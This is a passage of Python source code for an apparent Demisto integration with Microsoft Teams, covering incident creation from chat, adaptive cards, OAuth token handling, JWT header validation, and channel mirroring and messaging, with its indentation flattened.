'Low': 1,
'Medium': 2,
'High': 3,
'Critical': 4
}
return severity_dictionary.get(severity, 0)
def create_incidents(demisto_user: dict, incidents: list) -> dict:
"""
Creates incidents according to a provided JSON object
:param demisto_user: The demisto user associated with the request (if exists)
:param incidents: The incidents JSON
:return: The creation result
"""
if demisto_user:
data = demisto.createIncidents(incidents, userID=demisto_user.get('id', ''))
else:
data = demisto.createIncidents(incidents)
return data
def process_incident_create_message(demisto_user: dict, message: str) -> str:
"""
Processes an incident creation message
:param demisto_user: The Demisto user associated with the message (if exists)
:param message: The creation message
:return: Creation result
"""
json_pattern: str = r'(?<=json=).*'
name_pattern: str = r'(?<=name=).*'
type_pattern: str = r'(?<=type=).*'
json_match: Optional[Match[str]] = re.search(json_pattern, message)
created_incident: Union[dict, list]
data: str = str()
if json_match:
if re.search(name_pattern, message) or re.search(type_pattern, message):
data = 'No other properties other than json should be specified.'
else:
incidents_json: str = json_match.group()
incidents: Union[dict, list] = json.loads(incidents_json.replace('“', '"').replace('”', '"'))
if not isinstance(incidents, list):
incidents = [incidents]
created_incident = create_incidents(demisto_user, incidents)
if not created_incident:
data = 'Failed creating incidents.'
else:
name_match: Optional[Match[str]] = re.search(name_pattern, message)
if not name_match:
data = 'Please specify arguments in the following manner: name=<name> type=[type] or json=<json>.'
else:
incident_name: str = re.sub('type=.*', '', name_match.group()).strip()
incident_type: str = str()
type_match: Optional[Match[str]] = re.search(type_pattern, message)
if type_match:
incident_type = re.sub('name=.*', '', type_match.group()).strip()
incident: dict = {'name': incident_name}
incident_type = incident_type or INCIDENT_TYPE
if incident_type:
incident['type'] = incident_type
created_incident = create_incidents(demisto_user, [incident])
if not created_incident:
data = 'Failed creating incidents.'
if created_incident:
if isinstance(created_incident, list):
created_incident = created_incident[0]
created_incident = cast(Dict[Any, Any], created_incident)
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
data = f"Successfully created incident {created_incident.get('name', '')}.\n" \
f"View it on: {server_link}#/WarRoom/{created_incident.get('id', '')}"
return data
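# Illustrative direct-message argument formats accepted above (values are made up);
# they follow the `name=<name> type=[type] or json=<json>` convention from the error
# message in this function:
#
#   name=Phishing attempt type=Phishing
#   json={"name": "Phishing attempt", "type": "Phishing"}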
def is_investigation_mirrored(investigation_id: str, mirrored_channels: list) -> int:
"""
Checks if investigation is already mirrored
:param investigation_id: Investigation ID to check if mirrored
:param mirrored_channels: List of mirrored channels to check if investigation is mirrored in
:return: Index in mirrored channels list if mirrored, else -1
"""
for index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
return index
return -1
def urlify_hyperlinks(message: str) -> str:
"""
    Turns URLs into markdown hyperlinks,
e.g. https://www.demisto.com -> [https://www.demisto.com](https://www.demisto.com)
:param message: Message to look for URLs in
:return: Formatted message with hyper-links
"""
formatted_message: str = message
# URLify markdown hyperlinks
urls = re.findall(URL_REGEX, message)
for url in urls:
formatted_message = formatted_message.replace(url, f'[{url}]({url})')
return formatted_message
def get_team_member(integration_context: dict, team_member_id: str) -> dict:
"""
Searches for a team member
:param integration_context: Cached object to search for team member in
:param team_member_id: Team member ID to search for
:return: Found team member object
"""
team_member: dict = dict()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for member in team_members:
if member.get('id') == team_member_id:
team_member['username'] = member.get('name', '')
team_member['user_email'] = member.get('userPrincipalName', '')
return team_member
raise ValueError('Team member was not found')
def get_team_member_id(requested_team_member: str, integration_context: dict) -> str:
"""
Gets team member ID based on name, email or principal name
:param requested_team_member: Team member name / principal name / email to look for
:param integration_context: Cached object to search for team member in
:return: Team member ID
"""
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for team_member in team_members:
if requested_team_member in {team_member.get('name', ''), team_member.get('userPrincipalName', '')}:
return team_member.get('id')
raise ValueError('Team member was not found')
def create_adaptive_card(body: list, actions: list = None) -> dict:
"""
Creates Microsoft Teams adaptive card object given body and actions
:param body: Adaptive card data
:param actions: Adaptive card actions
:return: Adaptive card object
"""
adaptive_card: dict = {
'contentType': 'application/vnd.microsoft.card.adaptive',
'content': {
'$schema': 'http://adaptivecards.io/schemas/adaptive-card.json',
'version': '1.0',
'type': 'AdaptiveCard',
'body': body
}
}
if actions:
adaptive_card['content']['actions'] = actions
return adaptive_card
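# Example (illustrative values only): a card with one text block and a single submit
# action, built with the helper above.
#
#   sample_card = create_adaptive_card(
#       body=[{'type': 'TextBlock', 'text': 'Incident #1234 was opened'}],
#       actions=[{'type': 'Action.Submit', 'title': 'Acknowledge', 'data': {'response': 'ack'}}]
#   )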
def process_tasks_list(data_by_line: list) -> dict:
"""
    Processes the list of tasks assigned to the user, as provided by the Demisto server, and creates an adaptive card
:param data_by_line: List of tasks to process
:return: Adaptive card of assigned tasks
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'Task:',
'value': split_data[0]
},
{
'title': 'Incident:',
'value': split_data[1]
},
{
'title': 'Due:',
'value': split_data[2]
},
{
'title': 'Link:',
'value': f'[{split_data[3]}]({split_data[3]})'
}
]
})
return create_adaptive_card(body)
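# Expected input sketch (hypothetical values): data_by_line is a markdown table split into lines,
# where the first two lines are the header and separator, and each remaining line looks like
#   'Investigate | incident-42 | 2020-01-01 00:00:00 | https://server/#/WorkPlan/42'
# i.e. pipe-separated Task, Incident, Due and Link columns.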
def process_incidents_list(data_by_line: list) -> dict:
"""
    Processes the list of incidents assigned to the user, as returned by the Demisto server, and creates an adaptive card
:param data_by_line: List of incidents to process
:return: Adaptive card of assigned incidents
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'ID:',
'value': split_data[0]
},
{
'title': 'Name:',
'value': split_data[1]
},
{
'title': 'Status:',
'value': split_data[2]
},
{
'title': 'Type:',
'value': split_data[3]
},
{
'title': 'Owner:',
'value': split_data[4]
},
{
'title': 'Created:',
'value': split_data[5]
},
{
'title': 'Link:',
'value': f'[{split_data[6]}]({split_data[6]})'
}
]
})
return create_adaptive_card(body)
def process_mirror_or_unknown_message(message: str) -> dict:
"""
Processes mirror investigation command or unknown direct message and creates adaptive card
:param message: The direct message to process
:return: Adaptive card of mirror response / unknown message
"""
body: list = [{
'type': 'TextBlock',
'text': message.replace('\n', '\n\n'),
'wrap': True
}]
return create_adaptive_card(body)
def process_ask_user(message: str) -> dict:
"""
Processes ask user message and creates adaptive card
:param message: The question object
:return: Adaptive card of the question to send
"""
message_object: dict = json.loads(message)
text: str = message_object.get('message_text', '')
entitlement: str = message_object.get('entitlement', '')
options: list = message_object.get('options', [])
investigation_id: str = message_object.get('investigation_id', '')
task_id: str = message_object.get('task_id', '')
body = [
{
'type': 'TextBlock',
'text': text
}
]
actions: list = list()
for option in options:
actions.append({
'type': 'Action.Submit',
'title': option,
'data': {
'response': option,
'entitlement': entitlement,
'investigation_id': investigation_id,
'task_id': task_id
}
})
return create_adaptive_card(body, actions)
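# Expected message sketch (hypothetical values), matching the keys read above:
#   '{"message_text": "Approve block?", "entitlement": "<guid>", "options": ["Yes", "No"],
#     "investigation_id": "42", "task_id": "3"}'
# Each option becomes an Action.Submit button that posts the response back together with the entitlement data.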
def get_bot_access_token() -> str:
"""
Retrieves Bot Framework API access token, either from cache or from Microsoft
:return: The Bot Framework API access token
"""
integration_context: dict = demisto.getIntegrationContext()
access_token: str = integration_context.get('bot_access_token', '')
    valid_until: int = integration_context.get('bot_valid_until', 0)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
url: str = 'https://login.microsoftonline.com/botframework.com/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'client_secret': BOT_PASSWORD,
'scope': 'https://api.botframework.com/.default'
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response, 'bot')
raise ValueError(f'Failed to get bot access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['bot_access_token'] = access_token
integration_context['bot_valid_until'] = time_now + expires_in
demisto.setIntegrationContext(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get bot access token')
def get_graph_access_token() -> str:
"""
Retrieves Microsoft Graph API access token, either from cache or from Microsoft
:return: The Microsoft Graph API access token
"""
integration_context: dict = demisto.getIntegrationContext()
access_token: str = integration_context.get('graph_access_token', '')
    valid_until: int = integration_context.get('graph_valid_until', 0)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly.'
)
url: str = f'https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'scope': 'https://graph.microsoft.com/.default',
'client_secret': BOT_PASSWORD
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response)
raise ValueError(f'Failed to get Graph access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['graph_access_token'] = access_token
integration_context['graph_valid_until'] = time_now + expires_in
demisto.setIntegrationContext(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get Graph access token')
def http_request(
method: str, url: str = '', json_: dict = None, api: str = 'graph'
) -> Union[dict, list]:
"""
    A wrapper for the requests library: builds the required auth headers, sends the request and handles the response
:param method: any restful method
:param url: URL to query
:param json_: HTTP JSON body
:param api: API to query (graph/bot)
:return: requests.json()
"""
if api == 'graph':
access_token = get_graph_access_token()
else: # Bot Framework API
access_token = get_bot_access_token()
headers: dict = {
'Authorization': f'Bearer {access_token}',
'Content-Type': 'application/json',
'Accept': 'application/json'
}
try:
response: requests.Response = requests.request(
method,
url,
headers=headers,
json=json_,
verify=USE_SSL
)
if not response.ok:
error: str = error_parser(response, api)
raise ValueError(f'Error in API call to Microsoft Teams: [{response.status_code}] - {error}')
if response.status_code in {202, 204}:
# Delete channel returns 204 if successful
# Update message returns 202 if the request has been accepted for processing
return {}
if response.status_code == 201:
# For channel creation query, we get a body in the response, otherwise we should just return
if not response.content:
return {}
try:
return response.json()
except ValueError:
raise ValueError(f'Error in API call to Microsoft Teams: {response.text}')
except requests.exceptions.ConnectTimeout:
error_message = 'Connection Timeout Error - potential reason may be that Microsoft Teams is not ' \
'accessible from your host.'
raise ConnectionError(error_message)
except requests.exceptions.SSLError:
error_message = 'SSL Certificate Verification Failed - try selecting \'Trust any certificate\' in ' \
'the integration configuration.'
raise ConnectionError(error_message)
except requests.exceptions.ProxyError:
error_message = 'Proxy Error - if \'Use system proxy settings\' in the integration configuration has been ' \
'selected, try deselecting it.'
raise ConnectionError(error_message)
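# Illustrative call (hypothetical team ID), using the Graph API by default:
#   http_request('GET', f'{GRAPH_BASE_URL}/v1.0/teams/<team-aad-id>/channels')
# Pass api='bot' to authenticate against the Bot Framework API instead.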
def integration_health():
bot_framework_api_health = 'Operational'
graph_api_health = 'Operational'
try:
get_bot_access_token()
except ValueError as e:
bot_framework_api_health = f'Non operational - {str(e)}'
try:
get_graph_access_token()
except ValueError as e:
graph_api_health = f'Non operational - {str(e)}'
api_health_output: list = [{
'Bot Framework API Health': bot_framework_api_health,
'Graph API Health': graph_api_health
}]
    api_health_human_readable: str = tableToMarkdown('Microsoft API Health', api_health_output)
mirrored_channels_output = list()
integration_context: dict = demisto.getIntegrationContext()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
mirrored_channels_output.append({
'Team': team.get('team_name'),
'Channel': channel.get('channel_name'),
'Investigation ID': channel.get('investigation_id')
})
mirrored_channels_human_readable: str
if mirrored_channels_output:
mirrored_channels_human_readable = tableToMarkdown(
'Microsoft Teams Mirrored Channels', mirrored_channels_output
)
else:
mirrored_channels_human_readable = 'No mirrored channels.'
    demisto.results(api_health_human_readable + mirrored_channels_human_readable)
def validate_auth_header(headers: dict) -> bool:
"""
    Validates the authorization header provided in the bot activity object
:param headers: Bot activity headers
:return: True if authorized, else False
"""
parts: list = headers.get('Authorization', '').split(' ')
if len(parts) != 2:
return False
    schema: str = parts[0]
    jwt_token: str = parts[1]
    if schema != 'Bearer' or not jwt_token:
demisto.info('Authorization header validation - failed to verify schema')
return False
decoded_payload: dict = jwt.decode(jwt_token, verify=False)
issuer: str = decoded_payload.get('iss', '')
if issuer != 'https://api.botframework.com':
demisto.info('Authorization header validation - failed to verify issuer')
return False
integration_context: dict = demisto.getIntegrationContext()
open_id_metadata: dict = json.loads(integration_context.get('open_id_metadata', '{}'))
keys: list = open_id_metadata.get('keys', [])
unverified_headers: dict = jwt.get_unverified_header(jwt_token)
key_id: str = unverified_headers.get('kid', '')
key_object: dict = dict()
# Check if we got the requested key in cache
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in cache, getting new keys
try:
open_id_url: str = 'https://login.botframework.com/v1/.well-known/openidconfiguration'
response: requests.Response = requests.get(open_id_url, verify=USE_SSL)
if not response.ok:
demisto.info(f'Authorization header validation failed to fetch open ID config - {response.reason}')
return False
response_json: dict = response.json()
jwks_uri: str = response_json.get('jwks_uri', '')
keys_response: requests.Response = requests.get(jwks_uri, verify=USE_SSL)
if not keys_response.ok:
                demisto.info(f'Authorization header validation failed to fetch keys - {keys_response.reason}')
return False
keys_response_json: dict = keys_response.json()
keys = keys_response_json.get('keys', [])
open_id_metadata['keys'] = keys
except ValueError:
demisto.info('Authorization header validation - failed to parse keys response')
return False
if not keys:
# Didn't get new keys
demisto.info('Authorization header validation - failed to get keys')
return False
# Find requested key in new keys
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in new keys
demisto.info('Authorization header validation - failed to find relevant key')
return False
endorsements: list = key_object.get('endorsements', [])
if not endorsements or 'msteams' not in endorsements:
demisto.info('Authorization header validation - failed to verify endorsements')
return False
public_key: str = RSAAlgorithm.from_jwk(json.dumps(key_object))
options = {
'verify_aud': False,
'verify_exp': True
}
decoded_payload = jwt.decode(jwt_token, public_key, options=options)
audience_claim: str = decoded_payload.get('aud', '')
if audience_claim != demisto.params().get('bot_id'):
demisto.info('Authorization header validation - failed to verify audience_claim')
return False
integration_context['open_id_metadata'] = json.dumps(open_id_metadata)
demisto.setIntegrationContext(integration_context)
return True
''' COMMANDS + REQUESTS FUNCTIONS '''
def get_team_aad_id(team_name: str) -> str:
"""
Gets Team AAD ID
:param team_name: Team name to get AAD ID of
:return: team AAD ID
"""
integration_context: dict = demisto.getIntegrationContext()
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team_name == team.get('team_name', ''):
return team.get('team_aad_id', '')
url: str = f"{GRAPH_BASE_URL}/beta/groups?$filter=resourceProvisioningOptions/Any(x:x eq 'Team')"
response: dict = cast(Dict[Any, Any], http_request('GET', url))
teams = response.get('value', [])
for team in teams:
if team.get('displayName', '') == team_name:
return team.get('id', '')
raise ValueError('Could not find requested team.')
# def add_member_to_team(user_principal_name: str, team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/groups/{team_id}/members/$ref'
# requestjson_: dict = {
# '@odata.id': f'{GRAPH_BASE_URL}/v1.0/directoryObjects/{user_principal_name}'
# }
# http_request('POST', url, json_=requestjson_)
def get_users() -> list:
"""
Retrieves list of AAD users
:return: List of AAD users
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/users'
users: dict = cast(Dict[Any, Any], http_request('GET', url))
return users.get('value', [])
# def create_group_request(
# display_name: str, mail_enabled: bool, mail_nickname: str, security_enabled: bool,
# owners_ids: list, members_ids: list = None
# ) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups'
# data: dict = {
# 'displayName': display_name,
# 'groupTypes': ['Unified'],
# 'mailEnabled': mail_enabled,
# 'mailNickname': mail_nickname,
# 'securityEnabled': security_enabled,
# 'owners@odata.bind': owners_ids,
# 'members@odata.bind': members_ids or owners_ids
# }
# group_creation_response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=data))
# group_id: str = group_creation_response.get('id', '')
# return group_id
#
#
# def create_team_request(group_id: str) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups/{group_id}/team'
# team_creation_response: dict = cast(Dict[Any, Any], http_request('PUT', url, json_={}))
# team_id: str = team_creation_response.get('id', '')
# return team_id
#
#
# def add_bot_to_team(team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_id}/installedApps'
# bot_app_id: str = ''
# data: dict = {
# 'teamsApp@odata.bind': f'https://graph.microsoft.com/v1.0/appCatalogs/teamsApps/{bot_app_id}'
# }
# print(http_request('POST', url, json_=data))
#
#
# def create_team():
# display_name: str = demisto.args().get('display_name', '')
# mail_enabled: bool = bool(strtobool(demisto.args().get('mail_enabled', True)))
# mail_nickname: str = demisto.args().get('mail_nickname', '')
# security_enabled: bool = bool(strtobool(demisto.args().get('security_enabled', True)))
# owners = argToList(demisto.args().get('owner', ''))
# members = argToList(demisto.args().get('members', ''))
# owners_ids: list = list()
# members_ids: list = list()
# users: list = get_users()
# user_id: str = str()
# for member in members:
# found_member: bool = False
# for user in users:
# if member in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_member = True
# user_id = user.get('id', '')
# members_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_member:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {member} was not found',
# 'ContentsFormat': formats['text']
# })
# for owner in owners:
# found_owner: bool = False
# for user in users:
# if owner in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_owner = True
# user_id = user.get('id', '')
# owners_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_owner:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {owner} was not found',
# 'ContentsFormat': formats['text']
# })
# if not owners_ids:
# raise ValueError('Could not find given users to be Team owners.')
# group_id: str = create_group_request(
# display_name, mail_enabled, mail_nickname, security_enabled, owners_ids, members_ids
# )
# team_id: str = create_team_request(group_id)
# add_bot_to_team(team_id)
# demisto.results(f'Team {display_name} was created successfully')
def create_channel(team_aad_id: str, channel_name: str, channel_description: str = '') -> str:
"""
Creates a Microsoft Teams channel
:param team_aad_id: Team AAD ID to create channel in
:param channel_name: Name of channel to create
:param channel_description: Description of channel to create
:return: ID of created channel
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
request_json: dict = {
'displayName': channel_name,
'description': channel_description
}
channel_data: dict = cast(Dict[Any, Any], http_request('POST', url, json_=request_json))
channel_id: str = channel_data.get('id', '')
return channel_id
def get_channel_id(channel_name: str, team_aad_id: str, investigation_id: str = None) -> str:
"""
Retrieves Microsoft Teams channel ID
:param channel_name: Name of channel to get ID of
:param team_aad_id: AAD ID of team to search channel in
:param investigation_id: Demisto investigation ID to search mirrored channel of
:return: Requested channel ID
"""
investigation_id = investigation_id or str()
integration_context: dict = demisto.getIntegrationContext()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
if channel.get('channel_name') == channel_name or channel.get('investigation_id') == investigation_id:
return channel.get('channel_id')
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
response: dict = cast(Dict[Any, Any], http_request('GET', url))
channel_id: str = ''
channels: list = response.get('value', [])
for channel in channels:
channel_display_name: str = channel.get('displayName', '')
if channel_display_name == channel_name:
channel_id = channel.get('id', '')
break
if not channel_id:
raise ValueError(f'Could not find channel: {channel_name}')
return channel_id
def get_team_members(service_url: str, team_id: str) -> list:
"""
Retrieves team members given a team
:param team_id: ID of team to get team members of
:param service_url: Bot service URL to query
:return: List of team members
"""
url: str = f'{service_url}/v3/conversations/{team_id}/members'
response: list = cast(List[Any], http_request('GET', url, api='bot'))
return response
def update_message(service_url: str, conversation_id: str, activity_id: str, text: str):
"""
Updates a message in Microsoft Teams channel
:param service_url: Bot service URL to query
:param conversation_id: Conversation ID of message to update
:param activity_id: Activity ID of message to update
:param text: Text to update in the message
:return: None
"""
body = [{
'type': 'TextBlock',
'text': text
}]
adaptive_card: dict = create_adaptive_card(body=body)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
url: str = f'{service_url}/v3/conversations/{conversation_id}/activities/{activity_id}'
http_request('PUT', url, json_=conversation, api='bot')
def close_channel_request(team_aad_id: str, channel_id: str):
"""
Sends an HTTP request to close a Microsoft Teams channel
:param team_aad_id: AAD ID of team to close the channel in
:param channel_id: ID of channel to close
:return: None
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels/{channel_id}'
http_request('DELETE', url)
def close_channel():
"""
Deletes a mirrored Microsoft Teams channel
"""
integration_context: dict = demisto.getIntegrationContext()
channel_name: str = demisto.args().get('channel', '')
investigation: dict = demisto.investigation()
investigation_id: str = investigation.get('id', '')
channel_id: str = str()
team_aad_id: str
mirrored_channels: list
if not channel_name:
# Closing channel as part of autoclose in mirroring process
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_aad_id = team.get('team_aad_id', '')
mirrored_channels = team.get('mirrored_channels', [])
for channel_index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
channel_id = channel.get('channel_id', '')
close_channel_request(team_aad_id, channel_id)
mirrored_channels.pop(channel_index)
team['mirrored_channels'] = mirrored_channels
break
if not channel_id:
raise ValueError('Could not find Microsoft Teams channel to close.')
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
else:
team_name: str = demisto.args().get('team') or demisto.params().get('team')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
close_channel_request(team_aad_id, channel_id)
demisto.results('Channel was successfully closed.')
def create_personal_conversation(integration_context: dict, team_member_id: str) -> str:
"""
Create a personal conversation with a team member
:param integration_context: Cached object to retrieve relevant data for the conversation creation
:param team_member_id: ID of team member to create a conversation with
:return: ID of created conversation
"""
bot_id: str = demisto.params().get('bot_id', '')
bot_name: str = integration_context.get('bot_name', '')
tenant_id: str = integration_context.get('tenant_id', '')
conversation: dict = {
'bot': {
'id': f'28:{bot_id}',
'name': bot_name
},
'members': [{
'id': team_member_id
}],
'channelData': {
'tenant': {
'id': tenant_id
}
}
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
url: str = f'{service_url}/v3/conversations'
response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=conversation, api='bot'))
return response.get('id', '')
def send_message_request(service_url: str, channel_id: str, conversation: dict):
"""
Sends an HTTP request to send message to Microsoft Teams
:param channel_id: ID of channel to send message in
:param conversation: Conversation message object to send
:param service_url: Bot service URL to query
:return: None
"""
url: str = f'{service_url}/v3/conversations/{channel_id}/activities'
http_request('POST', url, json_=conversation, api='bot')
def send_message():
message_type: str = demisto.args().get('messageType', '')
original_message: str = demisto.args().get('originalMessage', '')
message: str = demisto.args().get('message', '')
try:
adaptive_card: dict = json.loads(demisto.args().get('adaptive_card', '{}'))
except ValueError:
raise ValueError('Given adaptive card is not in valid JSON format.')
if message_type == MESSAGE_TYPES['mirror_entry'] and ENTRY_FOOTER in original_message:
# Got a message which was already mirrored - skipping it
return
channel_name: str = demisto.args().get('channel', '')
if not channel_name and message_type in {MESSAGE_TYPES['status_changed'], MESSAGE_TYPES['incident_opened']}:
# Got a notification from server
channel_name = demisto.params().get('incident_notifications_channel', 'General')
severity: int = int(demisto.args().get('severity'))
severity_threshold: int = translate_severity(demisto.params().get('min_incident_severity', 'Low'))
if severity < severity_threshold:
return
team_member: str = demisto.args().get('team_member', '')
if not (team_member or channel_name):
raise ValueError('No channel or team member to send message were provided.')
if team_member and channel_name:
raise ValueError('Provide either channel or team member to send message to, not both.')
if not (message or adaptive_card):
raise ValueError('No message or adaptive card to send were provided.')
if message and adaptive_card:
        raise ValueError('Provide either message or adaptive card to send, not both.')
integration_context: dict = demisto.getIntegrationContext()
channel_id: str = str()
personal_conversation_id: str = str()
if channel_name:
team_name: str = demisto.args().get('team', '') or demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
investigation_id: str = str()
if message_type == MESSAGE_TYPES['mirror_entry']:
# Got an entry from the War Room to mirror to Teams
# Getting investigation ID in case channel name is custom and not the default
investigation: dict = demisto.investigation()
investigation_id = investigation.get('id', '')
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
elif team_member:
team_member_id: str = get_team_member_id(team_member, integration_context)
personal_conversation_id = create_personal_conversation(integration_context, team_member_id)
recipient: str = channel_id or personal_conversation_id
conversation: dict
if message:
entitlement_match: Optional[Match[str]] = re.search(ENTITLEMENT_REGEX, message)
if entitlement_match:
# In TeamsAsk process
adaptive_card = process_ask_user(message)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
else:
# Sending regular message
formatted_message: str = urlify_hyperlinks(message)
conversation = {
'type': 'message',
'text': formatted_message
}
else: # Adaptive card
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, recipient, conversation)
demisto.results('Message was sent successfully.')
def mirror_investigation():
"""
Updates the integration context with a new or existing mirror.
"""
investigation: dict = demisto.investigation()
if investigation.get('type') == PLAYGROUND_INVESTIGATION_TYPE:
raise ValueError('Can not perform this action in playground.')
integration_context: dict = demisto.getIntegrationContext()
mirror_type: str = demisto.args().get('mirror_type', 'all')
auto_close: str = demisto.args().get('autoclose', 'true')
mirror_direction: str = demisto.args().get('direction', 'both').lower()
team_name: str = demisto.args().get('team', '')
if not team_name:
team_name = demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
mirrored_channels: list = list()
teams: list = json.loads(integration_context.get('teams', '[]'))
team: dict = dict()
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
if team.get('mirrored_channels'):
mirrored_channels = team['mirrored_channels']
break
if mirror_direction != 'both':
mirror_type = f'{mirror_type}:{mirror_direction}'
investigation_id: str = investigation.get('id', '')
investigation_mirrored_index: int = is_investigation_mirrored(investigation_id, mirrored_channels)
if investigation_mirrored_index > -1:
# Updating channel mirror configuration
mirrored_channels[investigation_mirrored_index]['mirror_type'] = mirror_type
mirrored_channels[investigation_mirrored_index]['mirror_direction'] = mirror_direction
mirrored_channels[investigation_mirrored_index]['auto_close'] = auto_close
mirrored_channels[investigation_mirrored_index]['mirrored'] = False
demisto.results('Investigation mirror was updated successfully.')
else:
channel_name: str = demisto.args().get('channel_name', '') or f'incident-{investigation_id}'
channel_description: str = f'Channel to mirror incident {investigation_id}'
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
service_url: str = integration_context.get('service_url', '')
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
warroom_link: str = f'{server_link}#/WarRoom/{investigation_id}'
conversation: dict = {
'type': 'message',
'text': f'This channel was created to mirror [incident {investigation_id}]({warroom_link}) '
f'between Teams and Demisto. In order for your Teams messages to be mirrored in Demisto, '
f'you need to mention the Demisto Bot in the message.'
}
send_message_request(service_url, channel_id, conversation)
mirrored_channels.append({
'channel_id': channel_id,
'investigation_id': investigation_id,
'mirror_type': mirror_type,
'mirror_direction': mirror_direction,
'auto_close': auto_close,
'mirrored': False,
'channel_name': channel_name
})
demisto.results(f'Investigation mirrored successfully in channel {channel_name}.')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
def channel_mirror_loop():
"""
Runs in a long running container - checking for newly mirrored investigations.
"""
while True:
found_channel_to_mirror: bool = False
try:
integration_context = demisto.getIntegrationContext()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels = team.get('mirrored_channels', [])
channel: dict
for channel in mirrored_channels:
investigation_id = channel.get('investigation_id', '')
if not channel['mirrored']:
demisto.info(f'Mirroring incident: {investigation_id} in Microsoft Teams')
channel_to_update: dict = channel
if channel_to_update['mirror_direction'] and channel_to_update['mirror_type']:
demisto.mirrorInvestigation(
channel_to_update['investigation_id'],
channel_to_update['mirror_type'],
bool(strtobool(channel_to_update['auto_close']))
)
channel_to_update['mirrored'] = True
demisto.info(f'Mirrored incident: {investigation_id} to Microsoft Teams successfully')
else:
demisto.info(f'Could not mirror {investigation_id}')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
found_channel_to_mirror = True
break
if found_channel_to_mirror:
break
except Exception as e:
demisto.error(f'An error occurred in channel mirror loop: {str(e)}')
demisto.updateModuleHealth(f'An error occurred: {str(e)}')
finally:
time.sleep(5)
def member_added_handler(integration_context: dict, request_body: dict, channel_data: dict):
"""
Handles member added activity
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:return: None
"""
